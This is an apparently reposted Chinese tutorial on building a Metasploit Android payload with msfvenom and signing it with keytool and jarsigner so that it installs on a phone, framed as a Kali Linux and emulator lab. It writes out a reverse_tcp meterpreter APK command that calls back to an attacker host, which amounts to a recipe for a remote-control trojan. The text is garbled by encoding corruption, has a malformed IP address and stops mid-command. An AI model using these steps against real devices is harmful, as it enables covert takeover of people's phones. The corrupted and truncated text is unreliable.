如何使用Metasploit对安卓手机进行控制
在這次的實(shí)驗(yàn)中,我會使用kali linux和安卓模擬器演示如何使用Metasploit框架控制Android設(shè)備。創(chuàng)建負(fù)載我們需要兩臺虛擬機(jī):Kali Linux和安卓模擬器。 打開vm啟動Kali linux。接著打開終端,使用msfvenom制作android利用程序。Msfvenom是msfpayload和msfencode的組合。它是一個(gè)單一的工具。它有標(biāo)準(zhǔn)的命令行選項(xiàng)。 Msfvenom用來制造的有效載荷用來滲透Android模擬器。一旦打開終端提示符下輸入以下命令,使用msfvenom工具來創(chuàng)建有效載荷APK文件。msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apkp 設(shè)置要使用的payloadLHOST 設(shè)置用來接收反彈連接的主機(jī)LPORT 設(shè)置用來接收反彈連接的端口R 設(shè)置文件格式Location 要保存的文件位置這個(gè)命令執(zhí)行完之后,你會看到一些錯(cuò)誤,但不用擔(dān)心。現(xiàn)在可以到輸出目錄查看生成的apk了。我們已經(jīng)成功創(chuàng)建了Android格式(APK)文件的有效載荷。現(xiàn)在一般Android的移動設(shè)備不允許安裝沒有適當(dāng)簽名證書的應(yīng)用程序。 Android設(shè)備只安裝帶有簽署文件的APK。我們可以使用如下工具進(jìn)行手動簽名:l Keytool (已安裝)l jar signer (已安裝)l zipalign (需要安裝)執(zhí)行下列命令簽名。首先使用密鑰工具創(chuàng)建密鑰庫。keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000`然后使用JARsigner簽名APKjarsigner -verbose -sigalg SHA1withRSA -digestalg SHA
總結(jié)
以上是生活随笔為你收集整理的如何使用Metasploit对安卓手机进行控制的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: linux服务器删除cdn,有惊无险的一
- 下一篇: 黑群晖安装重启后无法自动进入